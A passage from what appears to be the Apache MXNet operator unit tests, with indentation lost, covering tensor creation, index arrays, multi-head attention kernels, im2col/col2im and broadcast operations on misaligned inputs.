data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
